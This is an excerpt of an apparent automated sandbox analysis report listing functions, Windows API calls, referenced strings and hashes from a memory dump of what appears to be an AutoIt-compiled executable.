                                                                                                                  • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,00000001,?,?,00000000), ref: 00DEC978
                                                                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00DECABE
                                                                                                                    • Part of subcall function 00DEB337: _wcscpy.LIBCMT ref: 00DEB36F
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CurrentDirectory$_wcscpy$FullNamePath__wsplitpath__wsplitpath_helper_wcscat
                                                                                                                  • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                                                                                  • API String ID: 2258743419-1018226102
                                                                                                                  • Opcode ID: ba3a9582c4c35e7a7102eb4c70b7e352a7f133705e9677f00bf4e290ade86e4c
                                                                                                                  • Instruction ID: db1074a9f4df085d1a6d6f270bfae52557613abda963afea5d6b70571037e8b4
                                                                                                                  • Opcode Fuzzy Hash: ba3a9582c4c35e7a7102eb4c70b7e352a7f133705e9677f00bf4e290ade86e4c
                                                                                                                  • Instruction Fuzzy Hash: 3A12A2715083819FC724EF25C881AAFBBE5FF98344F04591DF999A3261DB30DA49CB62
                                                                                                                  Function 00E4CE58 Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 205windowCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • _memset.LIBCMT ref: 00E4CEFB
                                                                                                                  • DestroyWindow.USER32(?,?), ref: 00E4CF73
                                                                                                                  • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00E4CFF4
                                                                                                                  • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00E4D016
                                                                                                                  • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00E4D025
                                                                                                                  • DestroyWindow.USER32(?), ref: 00E4D042
                                                                                                                  • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00DE0000,00000000), ref: 00E4D075
                                                                                                                  • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00E4D094
                                                                                                                  • GetDesktopWindow.USER32 ref: 00E4D0A9
                                                                                                                  • GetWindowRect.USER32(00000000), ref: 00E4D0B0
                                                                                                                  • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00E4D0C2
                                                                                                                  • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00E4D0DA
                                                                                                                    • Part of subcall function 00DFB526: GetWindowLongW.USER32(?,000000EB), ref: 00DFB537
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memset
                                                                                                                  • String ID: 0$tooltips_class32
                                                                                                                  • API String ID: 3877571568-3619404913
                                                                                                                  • Opcode ID: d65be3490cd1cbd307bbde09979dce5fb228817d2d23f516214827362203145f
                                                                                                                  • Instruction ID: b8f58043b6c0526bc5532cec653b9e22259c08d6f1a8d5bfdbef882350bd4f09
                                                                                                                  • Opcode Fuzzy Hash: d65be3490cd1cbd307bbde09979dce5fb228817d2d23f516214827362203145f
                                                                                                                  • Instruction Fuzzy Hash: FD7102B0648305AFD720CF28DC85F7A37EAEB89748F44551DF985A72A1D770E846CB22
                                                                                                                  Function 00E226BC Relevance: 24.6, APIs: 8, Strings: 6, Instructions: 137windowCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000016,00000000,?,?,00E53973,00000016,0000138C,00000016,?,00000016,00E7DDB4,00000000,?), ref: 00E226F1
                                                                                                                  • LoadStringW.USER32(00000000,?,00E53973,00000016), ref: 00E226FA
                                                                                                                  • GetModuleHandleW.KERNEL32(00000000,00000016,?,00000FFF,?,?,00E53973,00000016,0000138C,00000016,?,00000016,00E7DDB4,00000000,?,00000016), ref: 00E2271C
                                                                                                                  • LoadStringW.USER32(00000000,?,00E53973,00000016), ref: 00E2271F
                                                                                                                  • __swprintf.LIBCMT ref: 00E2276F
                                                                                                                  • __swprintf.LIBCMT ref: 00E22780
                                                                                                                  • _wprintf.LIBCMT ref: 00E22829
                                                                                                                  • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00E22840
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: HandleLoadModuleString__swprintf$Message_wprintf
                                                                                                                  • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR$s9
                                                                                                                  • API String ID: 618562835-2846937808
                                                                                                                  • Opcode ID: ae7affa909fcabfc5ed0c216b2081440f19fcfe916df55da28fd596d0cb7a00e
                                                                                                                  • Instruction ID: 949503d5854ec295313fefe863fe4cc45b93a1a4d0fc51fa770afc822994edf3
                                                                                                                  • Opcode Fuzzy Hash: ae7affa909fcabfc5ed0c216b2081440f19fcfe916df55da28fd596d0cb7a00e
                                                                                                                  • Instruction Fuzzy Hash: 70412B72800258BACB15FBE1ED86EEEB778EF15344F501069B60176092EA60AF49CB71
                                                                                                                  Function 00E2AAF8 Relevance: 23.1, APIs: 11, Strings: 2, Instructions: 374timeCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • VariantInit.OLEAUT32(00000000), ref: 00E2AB3D
                                                                                                                  • VariantCopy.OLEAUT32(?,?), ref: 00E2AB46
                                                                                                                  • VariantClear.OLEAUT32(?), ref: 00E2AB52
                                                                                                                  • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 00E2AC40
                                                                                                                  • __swprintf.LIBCMT ref: 00E2AC70
                                                                                                                  • VarR8FromDec.OLEAUT32(?,?), ref: 00E2AC9C
                                                                                                                  • VariantInit.OLEAUT32(?), ref: 00E2AD4D
                                                                                                                  • SysFreeString.OLEAUT32(00000016), ref: 00E2ADDF
                                                                                                                  • VariantClear.OLEAUT32(?), ref: 00E2AE35
                                                                                                                  • VariantClear.OLEAUT32(?), ref: 00E2AE44
                                                                                                                  • VariantInit.OLEAUT32(00000000), ref: 00E2AE80
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem__swprintf
                                                                                                                  • String ID: %4d%02d%02d%02d%02d%02d$Default
                                                                                                                  • API String ID: 3730832054-3931177956
                                                                                                                  • Opcode ID: cd3ce13034083239bdf89ac6f422f21a4fe5da2ef26514e74817585a8806cdc9
                                                                                                                  • Instruction ID: fe25417ef8820a19c0cabb813cc495510936d5e8ef266a991ebe8598d192274e
                                                                                                                  • Opcode Fuzzy Hash: cd3ce13034083239bdf89ac6f422f21a4fe5da2ef26514e74817585a8806cdc9
                                                                                                                  • Instruction Fuzzy Hash: 63D12331A04625DBDB209F65E885BBEB7B6FF04B00F1994A5E415BB181DB70EC40DBB2
                                                                                                                  Function 00E4716A Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 244windowCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • CharUpperBuffW.USER32(?,?), ref: 00E471FC
                                                                                                                  • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00E47247
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: BuffCharMessageSendUpper
                                                                                                                  • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                                                                  • API String ID: 3974292440-4258414348
                                                                                                                  • Opcode ID: 8834e688179a0d247d701180bfd3ef5515eb5111b1acaa3a5721cbe915bf6bf0
                                                                                                                  • Instruction ID: 674cbe0820fdbddb8d4bd0ae7e517edfcd3f13dee50f015bceae3d9e0827fcdf
                                                                                                                  • Opcode Fuzzy Hash: 8834e688179a0d247d701180bfd3ef5515eb5111b1acaa3a5721cbe915bf6bf0
                                                                                                                  • Instruction Fuzzy Hash: 0E9190702082419BCB04EF10D851A6EB7A1FF84314F159858FD96673A3DB70ED4ACBA1
                                                                                                                  Function 00E1CB82 Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 239COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • EnumChildWindows.USER32(?,00E1CF50), ref: 00E1CE90
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ChildEnumWindows
                                                                                                                  • String ID: 4+$CLASS$CLASSNN$H+$INSTANCE$L+$NAME$P+$REGEXPCLASS$T+$TEXT
                                                                                                                  • API String ID: 3555792229-2655548891
                                                                                                                  • Opcode ID: 34b7ac386fc3ede0926f062dd0d3b0669a0bf83a1334099d7e49f9bdf1619b54
                                                                                                                  • Instruction ID: 1b51d4b9ee7384385071e01652ed791213a91b948cae64e24721e2e5d2116806
                                                                                                                  • Opcode Fuzzy Hash: 34b7ac386fc3ede0926f062dd0d3b0669a0bf83a1334099d7e49f9bdf1619b54
                                                                                                                  • Instruction Fuzzy Hash: C4917130640646AACB18EF60C481BEEFBA5FF04344F64A569E949F7191DF306999CBE0
                                                                                                                  Function 00E4E4F5 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 199windowlibraryCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00E4E5AB
                                                                                                                  • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,00E4BEAF), ref: 00E4E607
                                                                                                                  • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00E4E647
                                                                                                                  • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00E4E68C
                                                                                                                  • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00E4E6C3
                                                                                                                  • FreeLibrary.KERNEL32(?,00000004,?,?,?,?,00E4BEAF), ref: 00E4E6CF
                                                                                                                  • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00E4E6DF
                                                                                                                  • DestroyCursor.USER32(?), ref: 00E4E6EE
                                                                                                                  • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00E4E70B
                                                                                                                  • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00E4E717
                                                                                                                    • Part of subcall function 00E00FA7: __wcsicmp_l.LIBCMT ref: 00E01030
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Load$Image$LibraryMessageSend$CursorDestroyExtractFreeIcon__wcsicmp_l
                                                                                                                  • String ID: .dll$.exe$.icl
                                                                                                                  • API String ID: 3907162815-1154884017
                                                                                                                  • Opcode ID: ee0bff41b58763c2a64516a90ccc1d5a54511568dfcaf69621b684d5e2631c02
                                                                                                                  • Instruction ID: 7aeafe63d6d127c832637d4b5c01ae9fb1c4610e70bbd9ec286e91c3c53844e1
                                                                                                                  • Opcode Fuzzy Hash: ee0bff41b58763c2a64516a90ccc1d5a54511568dfcaf69621b684d5e2631c02
                                                                                                                  • Instruction Fuzzy Hash: A761BF71A00215FEEB24DF64EC46FBE7BA8BB18764F104145F911F62D1EBB49980CB60
                                                                                                                  Function 00E2D219 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 138COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00DE936C: __swprintf.LIBCMT ref: 00DE93AB
                                                                                                                    • Part of subcall function 00DE936C: __itow.LIBCMT ref: 00DE93DF
                                                                                                                  • CharLowerBuffW.USER32(?,?), ref: 00E2D292
                                                                                                                  • GetDriveTypeW.KERNEL32 ref: 00E2D2DF
                                                                                                                  • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00E2D327
                                                                                                                  • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00E2D35E
                                                                                                                  • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00E2D38C
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: SendString$BuffCharDriveLowerType__itow__swprintf
                                                                                                                  • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                                                                  • API String ID: 1148790751-4113822522
                                                                                                                  • Opcode ID: 867dcd77f8bbfc59b860cbb50228ed37855c90e35d3efec4091b490b5f16e38f
                                                                                                                  • Instruction ID: ad2fe8d29dd58aa5a5925c80f770849a9e190a40d9ac17b87cf36dd7b542da3c
                                                                                                                  • Opcode Fuzzy Hash: 867dcd77f8bbfc59b860cbb50228ed37855c90e35d3efec4091b490b5f16e38f
                                                                                                                  • Instruction Fuzzy Hash: F1517B715043449FC700EF21D88196EB3E4FF98758F00986DF986672A1DB71EE0ACBA2
                                                                                                                  Function 00E2D0B8 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 101fileCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00E2D0D8
                                                                                                                  • __swprintf.LIBCMT ref: 00E2D0FA
                                                                                                                  • CreateDirectoryW.KERNEL32(?,00000000), ref: 00E2D137
                                                                                                                  • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00E2D15C
                                                                                                                  • _memset.LIBCMT ref: 00E2D17B
                                                                                                                  • _wcsncpy.LIBCMT ref: 00E2D1B7
                                                                                                                  • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00E2D1EC
                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00E2D1F7
                                                                                                                  • RemoveDirectoryW.KERNEL32(?), ref: 00E2D200
                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00E2D20A
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                                                                                  • String ID: :$\$\??\%s
                                                                                                                  • API String ID: 2733774712-3457252023
                                                                                                                  • Opcode ID: 92f781dac6cff2d6ca6690e75f670932ecffa07a5fbde3d1689f37d5cd6808a8
                                                                                                                  • Instruction ID: 03056019d185e6272ce7aa442843ff50be705af7d16df0628c0c8bfe6ec8f5a7
                                                                                                                  • Opcode Fuzzy Hash: 92f781dac6cff2d6ca6690e75f670932ecffa07a5fbde3d1689f37d5cd6808a8
                                                                                                                  • Instruction Fuzzy Hash: 6A31C772904119ABDB21DFA1DC48FEB77BCEF89744F5050B6F609E11A0E77096448B34
                                                                                                                  Function 00E4E731 Relevance: 22.6, APIs: 15, Instructions: 129filecommemoryCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00E4BEF4,?,?), ref: 00E4E754
                                                                                                                  • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00E4BEF4,?,?,00000000,?), ref: 00E4E76B
                                                                                                                  • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00E4BEF4,?,?,00000000,?), ref: 00E4E776
                                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?,00E4BEF4,?,?,00000000,?), ref: 00E4E783
                                                                                                                  • GlobalLock.KERNEL32(00000000), ref: 00E4E78C
                                                                                                                  • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,00E4BEF4,?,?,00000000,?), ref: 00E4E79B
                                                                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 00E4E7A4
                                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?,00E4BEF4,?,?,00000000,?), ref: 00E4E7AB
                                                                                                                  • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00E4E7BC
                                                                                                                  • OleLoadPicture.OLEAUT32(?,00000000,00000000,00E6D9BC,?), ref: 00E4E7D5
                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 00E4E7E5
                                                                                                                  • GetObjectW.GDI32(00000000,00000018,?), ref: 00E4E809
                                                                                                                  • CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 00E4E834
                                                                                                                  • DeleteObject.GDI32(00000000), ref: 00E4E85C
                                                                                                                  • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 00E4E872
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3840717409-0
                                                                                                                  • Opcode ID: c3ddf8e95db73793d9956e94e66f4c2fd2daeec93d9d07d8d83598baf866c1d7
                                                                                                                  • Instruction ID: 7b433125649b2a19cbf9ebeb350bad93361631f840398d4243a4911c6eb2969b
                                                                                                                  • Opcode Fuzzy Hash: c3ddf8e95db73793d9956e94e66f4c2fd2daeec93d9d07d8d83598baf866c1d7
                                                                                                                  • Instruction Fuzzy Hash: B7414975A00204EFDB119F66EC88EAB7BB9FF89765F108058F906E7260D7B09D44CB20
                                                                                                                  Function 00E305F8 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 230COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • __wsplitpath.LIBCMT ref: 00E3076F
                                                                                                                  • _wcscat.LIBCMT ref: 00E30787
                                                                                                                  • _wcscat.LIBCMT ref: 00E30799
                                                                                                                  • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00E307AE
                                                                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00E307C2
                                                                                                                  • GetFileAttributesW.KERNEL32(?), ref: 00E307DA
                                                                                                                  • SetFileAttributesW.KERNEL32(?,00000000), ref: 00E307F4
                                                                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00E30806
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
